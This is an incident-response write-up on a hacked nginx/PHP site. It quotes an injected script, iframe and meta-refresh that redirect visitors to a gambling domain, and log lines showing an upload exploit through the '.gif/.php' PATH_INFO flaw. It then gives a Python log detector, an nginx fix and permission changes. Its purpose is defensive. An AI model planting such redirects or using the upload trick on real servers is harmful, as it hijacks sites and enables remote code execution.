1. Content injected into the file:
'<script>{
window.location.href="http://www.22hy.com/html/livedealer.html?pid=1"
}</script>
<iframe src="http://www.22hy.com/html/livedealer.html?pid=1" align=center width="1440"
height="6500" ></iframe>
<meta http-equiv="refresh" content="0.1;URL=http://www.18hy.com/html/livedealer.html?pid=1">'
2. Check the timestamps of the modified file:
[roots]$ stat index.php.bad
File: "index.php.bad"
Size: 648 Blocks: 8 IO Block: 4096 普通文件
Device: fd00h/64768d Inode: 6553641 Links: 1
Access: (0755/-rwxr-xr-x) Uid: ( 502/ www) Gid: ( 0/ root)
Access: 2013-12-02 15:12:34.167243911 +0800
Modify: 2013-11-25 11:20:32.659258572 +0800
Change: 2013-11-29 18:24:29.209265041 +0800
3. Check the server (Linux) logs:
192.168.11.10 - - [25/Nov/2013:14:40:18 +0800] "POST /uc_server/data/tmp/upload30540323.gif/.php HTTP/1.0" 200 14 "http://bbs.navidog.cn" "Mozilla/5.0 (compatible; Baiduspider/2.0; +spider)"
192.168.11.10 - - [25/Nov/2013:14:40:18 +0800] "POST /uc_server/data/tmp/upload30540323.gif/.php HTTP/1.0" 200 381 "http://bbs.navidog.cn" "Mozilla/5.0 (compatible; Baiduspider/2.0; +spider)"
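Both log entries above request a path in which a file with a non-PHP extension (upload30540323.gif) is followed by a further segment ending in .php. The following is an added example, not part of the original post, that scans access-log lines in combined format for that shape; the extension list, the function name and the two benign sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Start of an access-log line in combined format, up to the status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Extensions treated as "not PHP" (assumed list; extend it to match allowed upload types).
STATIC_EXT = ("gif", "jpg", "jpeg", "png", "bmp", "txt", "zip", "ico")

# A path segment ending in a static extension, followed by a later segment ending in .php.
SUSPECT_RE = re.compile(
    r"/[^/]*\.(?:%s)/(?:[^/]*/)*[^/]*\.php(?:/.*)?$" % "|".join(STATIC_EXT),
    re.IGNORECASE,
)

# The first two lines are the entries quoted above; the last two are constructed benign traffic.
SAMPLE_LOG = [
    '192.168.11.10 - - [25/Nov/2013:14:40:18 +0800] "POST /uc_server/data/tmp/upload30540323.gif/.php HTTP/1.0" 200 14 "http://bbs.navidog.cn" "Mozilla/5.0 (compatible; Baiduspider/2.0; +spider)"',
    '192.168.11.10 - - [25/Nov/2013:14:40:18 +0800] "POST /uc_server/data/tmp/upload30540323.gif/.php HTTP/1.0" 200 381 "http://bbs.navidog.cn" "Mozilla/5.0 (compatible; Baiduspider/2.0; +spider)"',
    '192.168.11.20 - - [25/Nov/2013:14:41:02 +0800] "GET /forum.php?mod=viewthread&tid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.11.20 - - [25/Nov/2013:14:41:03 +0800] "GET /static/image/logo.gif HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

def find_pathinfo_hits(lines):
    """Return one dict per request whose path has the file.ext/x.php shape."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not an access-log line in the expected format
        # Drop the query string and decode percent-escapes before matching.
        path = unquote(urlsplit(m["target"]).path)
        if SUSPECT_RE.search(path):
            hits.append({"ip": m["ip"], "time": m["time"], "method": m["method"],
                         "path": path, "status": m["status"]})
    return hits

if __name__ == "__main__":
    for hit in find_pathinfo_hits(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["method"], hit["status"], hit["path"])
```

A hit with status 200 means the request was answered rather than rejected; after the nginx change in step 4 the same requests should be logged with 403.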
4. Block the vulnerability based on the logs:
location ~ ^(.+\.php)(.*)$
{
    # Capture the mapped file path up to the last ".php"
    if ($request_filename ~* (.*)\.php) {
        set $php_url $1;
    }
    # Refuse the request unless that .php file really exists on disk
    if (!-e $php_url.php) {
        return 403;
    }
    fastcgi_pass unix:/tmp/php-cgi.sock;
    fastcgi_index index.php;
    fastcgi_split_path_info ^(.+\.php)(.*)$;
    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    fastcgi_param PATH_INFO $fastcgi_path_info;
    fastcgi_param PATH_TRANSLATED $document_root$fastcgi_path_info;
    include fastcgi.conf;
}
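5. Change the permissions of the server files: the cache has write permission; PHP files have read and execute permission only.
6. Change the users: nginx is started by root, the nginx child (worker) processes access files as user www, and the owner of the directories is other.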
References:
http://zhumeng8337797.blog.163.com/blog/static/1007689142011815642384/
http://blog.phpdr.net/nginx-try-files.html